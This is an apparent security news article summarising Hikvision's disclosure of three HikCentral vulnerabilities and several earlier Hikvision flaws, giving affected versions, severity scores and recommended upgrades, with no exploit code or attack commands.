Hikvision, a leading provider of video surveillance equipment, has recently disclosed multiple critical security vulnerabilities affecting various versions of its HikCentral product suite. These flaws could allow attackers to execute malicious commands and gain unauthorized administrative access, posing significant risks to organizations utilizing these systems.
Overview of Identified Vulnerabilities
The vulnerabilities, identified as CVE-2025-39245, CVE-2025-39246, and CVE-2025-39247, were reported to the Hikvision Security Response Center (HSRC) by security researchers Yousef Alfuhaid, Nader Alharbi, Eduardo Bido, and Dr. Matthias Lutter.
1. Access Control Bypass (CVE-2025-39247)
This high-severity vulnerability affects HikCentral Professional versions V2.3.1 through V2.6.2, carrying a CVSS v3.1 base score of 8.6. It allows unauthenticated remote attackers to obtain administrator privileges without requiring user interaction or prior authentication credentials.
Technical Details:
The root cause lies in insufficient access control within the web service API endpoints of HikCentral Professional. Certain administrative functions fail to properly verify user authentication tokens, enabling specially crafted HTTP requests to invoke privileged operations.
2. CSV Injection Flaw (CVE-2025-39245)
This medium-severity vulnerability affects HikCentral Master Lite versions V2.2.1 through V2.3.2, with a CVSS score of 4.7. It enables attackers to inject executable commands through maliciously crafted CSV data files.
Technical Details:
When unsuspecting users import these compromised CSV files, the embedded commands execute within the application context, potentially compromising system availability and data processing integrity.
3. Unquoted Service Path Vulnerability (CVE-2025-39246)
This medium-severity vulnerability affects HikCentral FocSign versions V1.4.0 through V2.2.0, scoring 5.3 on the CVSS scale. It occurs when service executable paths contain spaces but lack proper quotation marks in the service configuration.
Technical Details:
Authenticated attackers with local system access can exploit this flaw by placing malicious executables in strategic filesystem locations. When the vulnerable service starts, Windows may execute the attacker’s payload instead of the legitimate service binary due to path resolution ambiguity.
Summary of Vulnerabilities:
| CVE ID | Title | CVSS 3.1 Score | Severity |
|——————|——————————————–|—————-|———-|
| CVE-2025-39245 | CSV Injection in HikCentral Master Lite | 4.7 | Medium |
| CVE-2025-39246 | Unquoted Service Path in HikCentral FocSign| 5.3 | Medium |
| CVE-2025-39247 | Access Control Bypass in HikCentral Professional | 8.6 | High |
Mitigation Measures
Hikvision has released security patches addressing all three vulnerabilities. Users are strongly advised to upgrade their systems to the latest versions to mitigate these risks.
Recommended Actions:
– HikCentral Master Lite Users: Upgrade to version V2.4.0.
– FocSign Users: Upgrade to version V2.3.0.
– HikCentral Professional Users: Install either V2.6.3 or V3.0.1 to remediate the severe access control bypass vulnerability.
Organizations should prioritize patching CVE-2025-39247 due to its high severity rating and potential for remote exploitation without authentication. Implementing comprehensive network segmentation can also help limit potential attack propagation.
Additional Security Concerns
Beyond the aforementioned vulnerabilities, Hikvision products have been subject to other significant security issues:
1. Critical Flaw in Hikvision Video Storage (CVE-2023-28808)
An access control vulnerability in Hikvision’s Hybrid SAN/Cluster storage products allows threat actors to obtain admin permissions by sending specially crafted messages to affected devices. This flaw carries a CVSS score of 9.1.
Affected Versions:
– DS-A71024/48/72R: Versions below V2.3.8-8 (including V2.3.8-8)
– DS-A71024/48R-CVS: Versions below V1.1.4 (including V1.1.4)
Mitigation:
Hikvision has released updates for all vulnerable devices. Users are advised to follow the provided upgrade instructions carefully.
2. Hikvision Network Camera Flaw Exposing DDNS Credentials
A critical security flaw in Hikvision network cameras allows attackers to intercept Dynamic DNS (DDNS) credentials transmitted in cleartext, potentially exposing thousands of devices to unauthorized access.
Affected Models:
– DS-2CD1xxxG0: Versions prior to V5.7.23 build241008
– DS-2CD2xx1G0: Versions prior to V5.7.23 build241008
– DS-2CD3xx1G0: Versions prior to V5.7.23 build241008
Mitigation:
Hikvision has released firmware updates to address this issue, modifying the cameras to communicate exclusively via HTTPS for DDNS services. Users are strongly recommended to update to the latest firmware immediately.
3. Hikvision Camera Driver Vulnerability (CVE-2024-12569)
A vulnerability in Hikvision camera drivers integrated with Milestone’s XProtect® Device Pack logs sensitive authentication details into plain-text log files during failed authentication attempts. This flaw has a CVSS v4.0 score of 5.2.
Affected Versions:
– XProtect Device Pack: Versions 13.4a and earlier
Mitigation:
Milestone has released an updated device pack to address the issue. Users are encouraged to update to the latest version and monitor log files for exposed credentials.
Conclusion
The discovery of these vulnerabilities underscores the critical importance of maintaining up-to-date security measures for surveillance systems. Organizations utilizing Hikvision products should promptly apply the recommended updates and implement robust security practices to safeguard their infrastructure against potential threats.
